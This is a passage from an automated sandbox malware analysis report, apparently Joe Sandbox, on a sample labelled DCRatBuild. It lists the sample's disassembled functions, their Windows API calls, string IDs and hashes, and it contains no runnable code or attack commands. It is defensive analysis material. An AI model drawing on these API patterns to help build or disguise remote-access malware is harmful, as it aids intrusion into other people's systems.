                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0074BAD7
                                        • FindClose.KERNEL32(00000000), ref: 0074BADE
                                        • _swprintf.LIBCMT ref: 0074BB37
                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 0074BB4A
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0074BB67
                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0074BB87
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0074BB97
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0074BBB1
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0074BBC9
                                        • _swprintf.LIBCMT ref: 0074BBF5
                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0074BC08
                                        • _swprintf.LIBCMT ref: 0074BC5C
                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 0074BC6F
                                          • Part of subcall function 0074A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0074A662
                                          • Part of subcall function 0074A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0076E600,?,?), ref: 0074A6B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                        • API String ID: 797121971-1840816070
                                        • Opcode ID: 6737ab9f7e0b428fd58d4a4e64451704c7d137871a24383a68ef2f0211b2d6bc
                                        • Instruction ID: ebb5cfe9adb25122fe78c39ac1690ebdcf47b91d612988361b4e6a0a821bd274
                                        • Opcode Fuzzy Hash: 6737ab9f7e0b428fd58d4a4e64451704c7d137871a24383a68ef2f0211b2d6bc
                                        • Instruction Fuzzy Hash: FB9186B2644348BBE6319BA0DC89FFB77ACEB4A700F044819F749D2091D779EA05C766
                                        Function 0073718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00737191
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007372F1
                                        • CloseHandle.KERNEL32(00000000), ref: 00737301
                                          • Part of subcall function 00737BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00737C04
                                          • Part of subcall function 00737BF5: GetLastError.KERNEL32 ref: 00737C4A
                                          • Part of subcall function 00737BF5: CloseHandle.KERNEL32(?), ref: 00737C59
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0073730C
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0073741A
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00737446
                                        • CloseHandle.KERNEL32(?), ref: 00737457
                                        • GetLastError.KERNEL32 ref: 00737467
                                        • RemoveDirectoryW.KERNEL32(?), ref: 007374B3
                                        • DeleteFileW.KERNEL32(?), ref: 007374DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3935142422-3508440684
                                        • Opcode ID: a5e8d2beacb28945ccea81fa477e7bbf1724d5c25e684277930d73f5a71eac21
                                        • Instruction ID: 14bb765b0c1b4c7de9b825ac4176b868e94f7e3e8fc324e006b724a4b3edfacb
                                        • Opcode Fuzzy Hash: a5e8d2beacb28945ccea81fa477e7bbf1724d5c25e684277930d73f5a71eac21
                                        • Instruction Fuzzy Hash: 70B1F2B1904255EBEF25DFA4CC45FEE77B8AF04300F004569F94AE7142E778AA48CBA1
                                        Function 00733281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog_memcmp
                                        • String ID: CMT$h%u$hc%u
                                        • API String ID: 3004599000-3282847064
                                        • Opcode ID: b13512016bfd4e2276d17af02334dcd322d9f1bae6fdc72d266fbe68f55b9a04
                                        • Instruction ID: 06bfedf557d382076dea6b0bf25ce7cda4dcdf09eb1648bec94ddf7540fb5389
                                        • Opcode Fuzzy Hash: b13512016bfd4e2276d17af02334dcd322d9f1bae6fdc72d266fbe68f55b9a04
                                        • Instruction Fuzzy Hash: 1F32A671510684DFEF25DF34C896AEA37A5AF14300F04457EFD8A8B283DB78A948CB60
                                        Function 0075D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 5a16100cb5cfd50cf1466a1bc02fa6d0221c7c2da2ab63bd08d6467d85b0114f
                                        • Instruction ID: 6ab2fa7fc4b697129138d558434c73293f25494d87f38464fb59b113ec0a82be
                                        • Opcode Fuzzy Hash: 5a16100cb5cfd50cf1466a1bc02fa6d0221c7c2da2ab63bd08d6467d85b0114f
                                        • Instruction Fuzzy Hash: 29C23C71E046288FDB39CE28DD447E9B7B5EB44306F1545EAD80DE7240E7B9AE898F40
                                        Function 007327E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 007327F1
                                        • _strlen.LIBCMT ref: 00732D7F
                                          • Part of subcall function 0074137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0073B652,00000000,?,?,?,00050160), ref: 00741396
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00732EE0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 1706572503-2756464174
                                        • Opcode ID: f4b0c00e3f5fb40aefbd90f07da6fd1700e67ce89265622a82ed52963108a893
                                        • Instruction ID: adebcf6dc3ae84b27ada12d68c7eae86868b7eb97b2b6a2c6953bfd463fae083
                                        • Opcode Fuzzy Hash: f4b0c00e3f5fb40aefbd90f07da6fd1700e67ce89265622a82ed52963108a893
                                        • Instruction Fuzzy Hash: 0262F571600244CFEF29DF34C8896EA3BE1AF54300F15457DED9A9B283DB79A946CB60
                                        Function 0075866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00758767
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00758771
                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0075877E
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: acf75632de73cdb6d273d2ca81d9d497b7d22e897a26f4ccda94d49b17b37912
                                        • Instruction ID: d3a0d7876b9656f731b39a4d423cdc890c8d8208390489f180642ccef9bdfe85
                                        • Opcode Fuzzy Hash: acf75632de73cdb6d273d2ca81d9d497b7d22e897a26f4ccda94d49b17b37912
                                        • Instruction Fuzzy Hash: 4731B37590122C9BCB61DF64D889BDCBBB8BF48310F5041EAE81CA7251EB749B858F45
                                        Function 0075CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                        • Instruction ID: 6feb8eefc141e11638c4d021b56b68d8c2bd510af6ccf8b483d2c2c0431f0f19
                                        • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                        • Instruction Fuzzy Hash: 8A024C72E002199FDF15CFA9C8807EDBBF1EF48325F25416AD819E7284D775AA45CB80
                                        Function 0074A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0074A662
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0076E600,?,?), ref: 0074A6B1
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: d817aed05cbf5d42bf5fb9f768a34ae708298eea07cd5a1a5f7ea0dc6534adc0
                                        • Instruction ID: 4d3a377d9e44f48953aed2d4282ea357bb1e1ce17dc9c69f946e4f6453cc5405
                                        • Opcode Fuzzy Hash: d817aed05cbf5d42bf5fb9f768a34ae708298eea07cd5a1a5f7ea0dc6534adc0
                                        • Instruction Fuzzy Hash: E4017176540308BFDB109F65EC09F9B77BCEF19710F108822FA0597150E3B49A24C7A9
                                        Function 00736EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(0074117C,?,00000200), ref: 00736EC9
                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00736EEA
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 692a490164ce2617640b13e52c9dda4b77f5eccad386cf57d7edec57864402f9
                                        • Instruction ID: e79e0b49e493c246e52b39b3a8677e8e67145de019a64cb3db539a6b13ed2519
                                        • Opcode Fuzzy Hash: 692a490164ce2617640b13e52c9dda4b77f5eccad386cf57d7edec57864402f9
                                        • Instruction Fuzzy Hash: 6FD092352C8302BAFA110A748C06F2A7BA5B755B82F20C514B257ED0E1CAB490289629
                                        Function 00761194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0076118F,?,?,00000008,?,?,00760E2F,00000000), ref: 007613C1
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 8d1a750396115dfd588d0cf5f02e816cc2b4d62206cae5274885ac03b2eb57d4
                                        • Instruction ID: 8a4d39cf86688f18e897251a03eb289cbd3ba325b213daa3a4b4680768aec007
                                        • Opcode Fuzzy Hash: 8d1a750396115dfd588d0cf5f02e816cc2b4d62206cae5274885ac03b2eb57d4
                                        • Instruction Fuzzy Hash: 5EB15D71610608DFD719CF28C48AB657BE0FF45364F698698ED9ACF2A1C739E981CB40
                                        Function 0073407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        • Opcode ID: 7b50b6d83b1c7c0f2cb65b603caa04fff4bf451b706d5fed9010ba455ade017b
                                        • Instruction ID: ff2ea4393e3f02c3208bc5a7c5552a32178c28c6f402ccc669228623af1c4687
                                        • Opcode Fuzzy Hash: 7b50b6d83b1c7c0f2cb65b603caa04fff4bf451b706d5fed9010ba455ade017b
                                        • Instruction Fuzzy Hash: 22F1C2B1A083418FD748CF29D880A1AFBE1BFCC208F15892EF599D7711E634E9558B56
                                        Function 0073ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0073AD1A
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: ad279aaceb11945c5fdf6ac74504bc1e4f7332830bf080ac795ff6bab4f6ba1b
                                        • Instruction ID: 0d3ec0cd33becad4cb1e2de6e4c29fc3157da3d701f0b5a6bf7a2b7b87302ecc
                                        • Opcode Fuzzy Hash: ad279aaceb11945c5fdf6ac74504bc1e4f7332830bf080ac795ff6bab4f6ba1b
                                        • Instruction Fuzzy Hash: 2EF06DB8A0030CCFDB28DB18EC426E973B1F748305F208295D91983368D7B8AD80CEA5
                                        Function 0074F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0074EAC5), ref: 0074F068
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 8f71d5347ac4f04d83a4a19a40720c00280a325e340c2fc0506e69a76c6d31c2
                                        • Instruction ID: 235fb6ab5ffc3edb50ecfdd6c078eacb24c90d92f0e555ea521299f809fa0efc
                                        • Opcode Fuzzy Hash: 8f71d5347ac4f04d83a4a19a40720c00280a325e340c2fc0506e69a76c6d31c2
                                        • Instruction Fuzzy Hash:
                                        Function 0075B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: eb7e974525d8f736928b1d43127866783c5d674e1b054641f9ab2c4746b48cc2
                                        • Instruction ID: cf0f9d1210e699111860ab173f4dc79d51d8fedd9ae7febfcecaf8f9738077d7
                                        • Opcode Fuzzy Hash: eb7e974525d8f736928b1d43127866783c5d674e1b054641f9ab2c4746b48cc2
                                        • Instruction Fuzzy Hash: 90A012705002018B83008F31590820835A96501180304C1159005C1060DA2844308F04
                                        Function 00745C77 Relevance: .8, Instructions: 800COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                        • Instruction ID: 314e7aaff7bf4e282365e2ebb93adca7635487135f79277edd856ef81d487464
                                        • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                        • Instruction Fuzzy Hash: 6C62F871604B899FCB29CF38C8906B9BBE1AF56304F04856DD9EA8B347D738E945CB11
                                        Function 007470BF Relevance: .8, Instructions: 773COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                        • Instruction ID: 78001c07e4dcbe4a275fcb593803984cfd97e15883f1c8caf314b9f94d80985b
                                        • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                        • Instruction Fuzzy Hash: 1E62037060878A9FC71DCF28C8805B9FBE1BF55304F14866ED9A68B742E738E955CB81
                                        Function 0073ED14 Relevance: .7, Instructions: 694COMMON
                                        Download Yara Rule
                                        Memory Dump Source
